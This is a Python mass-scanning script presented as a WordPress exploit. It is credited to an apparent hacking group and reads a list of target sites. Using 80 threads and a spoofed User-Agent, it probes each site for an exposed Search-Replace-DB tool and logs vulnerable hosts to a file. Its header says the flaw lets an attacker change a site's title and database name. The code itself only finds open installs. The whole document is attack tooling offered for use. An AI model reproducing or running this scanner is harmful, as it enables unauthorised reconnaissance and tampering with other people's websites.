# Exploit Title : Wordpress Replace DataBase # Discovery : Demon King # Team : Ganest Seven # This bug changes the title and database name all # import requests import sys from multiprocessing.dummy import Pool from requests.packages.urllib3.exceptions import InsecureRequestWarning from colorama import Fore requests.packages.urllib3.disable_warnings(InsecureRequestWarning) listSite = sys.argv[1] op = [i.strip() for i in open(listSite, "r").readlines()] fr = '\033[91m' fc = '\033[96m' fw = '\033[0m' fg = '\033[92m' CYAN = '\033[96m' GREEN = '\033[92m' RED = '\033[91m' END = '\033[0m' headers = {"User-Agent": "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} def check(site): try: r = requests.get("http://" + site + "/Search-Replace-DB-master", headers=headers, timeout=5) ff = open("ignition.txt", "a+") if 'The GET method is not supported' in r.content: print("http://" + site + "/ -> SRDB!") ff.write("http://" + site + "/\n") else: print("http://" + site + " -> x") except: print("http://" + site + " -> BOSOK") kekw = Pool(80) #thread kekw.map(check, op) kekw.close() kekw.join()